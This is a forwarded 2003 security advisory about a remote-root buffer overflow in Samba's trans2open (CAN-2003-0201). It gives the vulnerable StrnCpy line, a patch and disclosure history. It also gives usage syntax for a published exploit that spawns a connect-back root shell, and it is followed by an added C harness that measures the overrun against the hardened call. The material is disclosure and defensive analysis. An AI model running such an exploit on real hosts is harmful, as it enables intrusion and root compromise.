Mike Tancsa
2003-Apr-07 06:16 UTC
Fwd: [VulnWatch] [DDI-1013] Buffer Overflow in Samba allows remote root compromise
FYI

>Mailing-List: contact vulnwatch-help@vulnwatch.org; run by ezmlm
>List-Post: <mailto:vulnwatch@vulnwatch.org>
>List-Help: <mailto:vulnwatch-help@vulnwatch.org>
>List-Unsubscribe: <mailto:vulnwatch-unsubscribe@vulnwatch.org>
>List-Subscribe: <mailto:vulnwatch-subscribe@vulnwatch.org>
>Delivered-To: mailing list vulnwatch@vulnwatch.org
>Delivered-To: moderator for vulnwatch@vulnwatch.org
>Date: Mon, 7 Apr 2003 07:44:58 +0000 (UTC)
>From: Erik Parker <erik.parker@digitaldefense.net>
>X-X-Sender: Erik Parker <erik.parker@digitaldefense.net>
>To: vulnwatch@vulnwatch.org
>Subject: [VulnWatch] [DDI-1013] Buffer Overflow in Samba allows remote
>root compromise
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
>|------------------------------------------------------------------------------|
>                    Digital Defense Inc. Security Advisory
>  DDI-1013                                          labs@digitaldefense.net
>                                                    http://www.digitaldefense.net/
>|------------------------------------------------------------------------------|
>
>Synopsis          : Buffer Overflow in Samba allows remote root compromise
>Package           : Samba, Samba-TNG
>Type              : Remote Root Compromise
>Issue date        : 04-07-2003
>Versions Affected : < Samba 2.2.8a, <= Samba 2.0.10, < Samba-TNG 0.3.2
>Not Affected      : Samba 3.0 Alpha Versions, CVS Versions of Samba-TNG
>CVE Id            : CAN-2003-0201
>
>|------------------------------------------------------------------------------|
>
>
>o Product description:
>  Samba is an Open Source/Free Software suite that provides seamless file
>  and print services to SMB/CIFS clients. Samba-TNG was originally a fork
>  off of the Samba source tree, and aims at being a substitute for a
>  Windows NT domain controller.
>
>
>o Problem description:
>  An anonymous user can gain remote root access due to a buffer overflow
>  caused by a StrnCpy() into a char array (fname) using a non-constant
>  length (namelen).
>
>    StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */
>
>  In the call_trans2open function in trans2.c, the Samba StrnCpy function
>  copies pname into fname using namelen. The variable namelen is assigned
>  the value of strlen(pname)+1, which causes the overflow.
>
>  The variable 'fname' is a _typedef_ pstring, which is a char with a
>  size of 1024. If pname is greater than 1024, you can overwrite almost
>  anything you want past the 1024th byte that fits inside of
>  sizeof(pname), or the value returned by SVAL(inbuf,smbd_tpscnt) in
>  function reply_trans2(), which should be around 2000 bytes.
>
>  The Common Vulnerabilities and Exposures (CVE) project has assigned the
>  name CAN-2003-0201 to this issue. This is a candidate for inclusion in
>  the CVE list (http://cve.mitre.org), which standardizes names for
>  security problems.
>
>
>o Testing Environment:
>  Tested against source compiles and binary packages of Samba from version
>  2.2.5 to 2.2.8 on the following x86 platforms:
>
>    Red Hat Linux 7.1, 7.3, 8.0
>    Gentoo Linux 1.4-rc3
>    SuSE Linux 7.3
>    FreeBSD 4.6, 4.8, 5.0
>    Solaris 9
>
>
>o Solutions and Workarounds:
>  Upgrading to the latest version of Samba or Samba-TNG is the recommended
>  solution to this vulnerability. Samba version 2.2.8a, and Samba-TNG
>  version 0.3.2 are not vulnerable. There will be no new releases for the
>  2.0 line of Samba code. The only fix for Samba 2.0 is to apply the
>  patches that Samba is providing.
>
>  A workaround in the current source code for this specific vulnerability
>  would be to modify the StrnCpy line found at line 250 in smbd/trans2.c
>  in the Samba 2.2.8 source code:
>
>    -StrnCpy(fname,pname,namelen);
>    +StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));
>
>  As a result of this vulnerability being identified, at least three
>  others have also been found by the Samba team after reviewing similar
>  usages in the source tree. One is a static overflow and the other two
>  are heap overflows.
>
>  Applying the fix above will only protect against the specific problem
>  identified in this advisory. To fully protect yourself, you must apply
>  the patches from Samba, or upgrade to 2.2.8a.
>
>  Samba is available for download from:     http://www.samba.org/
>  Samba-TNG is available for download from: http://www.samba-tng.org/
>
>
>o Exploit:
>  An exploit named trans2root.pl has been posted on the Digital Defense,
>  Inc. website. A quick UDP-based scanner named nmbping.pl has also been
>  posted to assist you in identifying Samba servers on your network. Both
>  are available for download from the following URL:
>
>    http://www.digitaldefense.net/labs/securitytools.html
>
>  This exploit works against all distributions listed in the testing
>  environment section. Usage is as follows:
>
>    trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>
>
>  This exploit should work against all x86 Linux, Solaris, and FreeBSD
>  hosts running the 2.2.x branch of Samba. Hosts with a non-executable
>  stack are not vulnerable to this particular exploit. The exploit will
>  cause the target host to connect back to the host running the exploit
>  and spawn a root shell on the defined port (default is 1981).
>
>  The scanner is very easy to use, and should detect and identify Samba
>  and Windows SMB services. Usage is as follows:
>
>    nmbping.pl <network/cidr>
>
>
>o Forced Release:
>  This vulnerability is being actively exploited in the wild. Digital
>  Defense, Inc. discovered this bug by analyzing a packet capture of an
>  attack against a host running Samba 2.2.8. The attack captured was
>  performed on April 1st, 2003. Samba users are urged to check their Samba
>  servers for signs of compromise. Samba and Digital Defense, Inc. decided
>  to release their advisories before all vendors had a chance to update
>  their packages due to this vulnerability being actively exploited.
>
>
>o Revision History:
>  04-07-2003  Initial public release
>
>  Latest revision available at:
>    http://www.digitaldefense.net/labs/advisories.html
>
>
>o Vendor Contact Information:
>  04-03-2003  security@samba.org notified
>  04-03-2003  elrond@samba-tng.org notified.
>  04-03-2003  Samba Team responds via telephone, acknowledges vulnerability
>  04-03-2003  Elrond of Samba-TNG responds and acknowledges vulnerability
>  04-04-2003  Samba Team notifies vendorsec mailing list
>  04-07-2003  Initial public release
>
>o Thanks to:
>  Elrond of Samba-TNG, The Samba Security Team, and everyone on the
>  Digital Defense Inc., SECOPS team.
>
>-----BEGIN PGP SIGNATURE-----
>
>iD8DBQE+kT/5jB+XO4ZKjSARAsJpAJsH05MqOIqauWrK1kKOAkwmCsXorgCeK92r
>eDEmOgRY4z7Y0b7HecHyf+A
>=Af+n
>-----END PGP SIGNATURE-----

--------------------------------------------------------------------------
Mike Tancsa,                                      tel +1 519 651 3400
Sentex Communications,                            mike@sentex.net
Providing Internet since 1994                     www.sentex.net
Cambridge, Ontario Canada                         www.sentex.net/mike
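The forwarded advisory describes the vulnerable call StrnCpy(fname,pname,namelen) in call_trans2open and the MIN(namelen, sizeof(fname)-1) workaround. The C harness below is an added example, not code from the advisory, from Digital Defense or from Samba. It models StrnCpy with the copy-then-terminate semantics of Samba 2.2's lib/util_str.c (an assumption about that implementation), places a 1024-byte stand-in for the pstring fname at the head of a larger canary-filled arena, and counts how many bytes past fname each variant of the call overwrites for a constructed pname of a given length. Nothing here is Samba's real trans2 parsing; it isolates the copy so the overrun is measurable without corrupting the stack.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Samba 2.2's pstring is a char[1024]; fname in call_trans2open is one. */
#define PSTRING_LEN 1024

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

/*
 * Model of Samba's StrnCpy (assumed from lib/util_str.c): copy at most n
 * characters, stopping at the source NUL, then ALWAYS write a terminating
 * NUL. For a source of n or more characters this touches n+1 bytes of
 * dest, which is why the advisory's fix bounds n to sizeof(fname)-1 and
 * not sizeof(fname).
 */
static char *StrnCpy(char *dest, const char *src, size_t n)
{
    char *d = dest;
    if (!dest)
        return NULL;
    if (!src) {
        *dest = 0;
        return dest;
    }
    while (n-- && (*d++ = *src++))
        ;
    *d = 0;
    return dest;
}

/*
 * Constructed test arena (not a Samba structure): the first PSTRING_LEN
 * bytes stand in for fname, the remainder is canary. An overrun lands
 * inside the arena, which is defined behaviour, so we can count the
 * damage instead of crashing.
 */
#define ARENA_LEN (PSTRING_LEN * 4)
#define CANARY 0xAA

/*
 * Perform the trans2open copy with a pname of pname_len 'A' characters
 * and return how many bytes beyond fname were overwritten.
 *   hardened == 0 : original  StrnCpy(fname,pname,namelen)
 *   hardened != 0 : advisory  StrnCpy(fname,pname,MIN(namelen,sizeof(fname)-1))
 */
static size_t trans2open_overrun(int hardened, size_t pname_len)
{
    static char arena[ARENA_LEN];
    static char pname[ARENA_LEN];

    if (pname_len > ARENA_LEN - 2)      /* keep the harness itself in bounds */
        pname_len = ARENA_LEN - 2;

    memset(arena, CANARY, sizeof arena);
    memset(pname, 'A', pname_len);
    pname[pname_len] = '\0';

    char *fname = arena;                    /* pstring fname */
    size_t namelen = strlen(pname) + 1;     /* as computed in call_trans2open */

    if (hardened)
        StrnCpy(fname, pname, MIN(namelen, (size_t)(PSTRING_LEN - 1)));
    else
        StrnCpy(fname, pname, namelen);

    size_t clobbered = 0;
    for (size_t i = PSTRING_LEN; i < ARENA_LEN; i++)
        if ((unsigned char)arena[i] != CANARY)
            clobbered++;
    return clobbered;
}

int main(void)
{
    size_t lens[] = { 10, 1022, 1023, 2000 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("pname_len=%4zu  original: %4zu bytes past fname  hardened: %zu\n",
               lens[i], trans2open_overrun(0, lens[i]),
               trans2open_overrun(1, lens[i]));
    return 0;
}
```

Two things the harness makes visible that the diff alone does not. First, a pname of only 1023 characters already overruns fname by one byte with the original call, because namelen is strlen(pname)+1 and StrnCpy appends its own NUL after copying namelen bytes; the roughly 2000-byte pname the advisory mentions spills close to a thousand bytes past the buffer. Second, the hardened call writes exactly 1024 bytes for any oversized pname, so the -1 in sizeof(fname)-1 is load-bearing; bounding to sizeof(fname) would still place the terminator one byte off the end. The bound truncates the name silently, which is acceptable for a workaround, but as the advisory says, it covers only this call site and the full Samba patch or 2.2.8a is still required.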